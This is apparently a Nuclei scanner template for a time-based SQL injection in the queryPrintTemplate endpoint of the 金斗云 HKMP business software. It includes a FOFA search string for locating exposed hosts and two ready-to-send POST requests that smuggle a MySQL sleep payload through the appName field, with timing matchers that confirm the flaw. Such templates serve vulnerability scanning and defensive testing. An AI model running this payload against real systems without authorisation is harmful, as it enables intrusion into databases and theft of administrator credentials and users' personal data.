id: jindouyun-HKMP-queryPrintTemplate-sql
info:
  name: 金斗云 HKMP智慧商业软件 queryPrintTemplate SQL延时注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="金斗云 Copyright"
    金斗云 HKMP智慧商业软件 queryPrintTemplate 接口存在SQL注入漏洞，未经身份验证的远程攻击者可利用漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486505&idx=1&sn=c4d82840e6c780236dc7745f65185c59&chksm=c267b91af510300ca1338bd0824b49f627cf4fa83a2c916003ece29779e00fe3b47fd8f9b16c&token=1628549949&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        POST /admin/configApp/queryPrintTemplate HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/json

        {"appId":"hkmp","data":{"appName":"悟空POS Win版' AND (SELECT 5 from (select(sleep(2)))x) and 'zz'='zz","configGroup":"1","mchId":"0001"},"deviceId":"hkmp","mchId":"hkmp","nonce":3621722933,"sign":"hkmp","timestamp":1719306504}

      - |
        POST /admin/configApp/queryPrintTemplate HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/json

        {"appId":"hkmp","data":{"appName":"悟空POS Win版' AND (SELECT 5 from (select(sleep(4)))x) and 'zz'='zz","configGroup":"1","mchId":"0001"},"deviceId":"hkmp","mchId":"hkmp","nonce":3621722933,"sign":"hkmp","timestamp":1719306504}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and


